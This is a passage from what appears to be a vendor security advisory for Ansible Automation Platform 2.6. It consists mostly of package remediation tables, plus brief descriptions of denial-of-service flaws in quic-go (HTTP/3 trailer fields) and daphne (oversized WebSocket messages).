| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
A flaw was found in quic-go, an implementation of the QUIC protocol in Go. A remote attacker can exploit this by sending specially crafted HTTP/3 trailer fields. This can cause the system to allocate excessive memory, leading to a denial-of-service (DoS) condition where the affected server or client may crash or run out of resources.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src | — |
Workaround
|
A flaw was found in daphne. An unauthenticated remote attacker could exploit this vulnerability by sending arbitrarily large WebSocket messages or frames. This oversight in payload size handling can lead to excessive memory consumption, resulting in a denial of service (DoS) for the affected system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64 | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64 | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64 | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64 | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64 | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64 | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x | — | ||
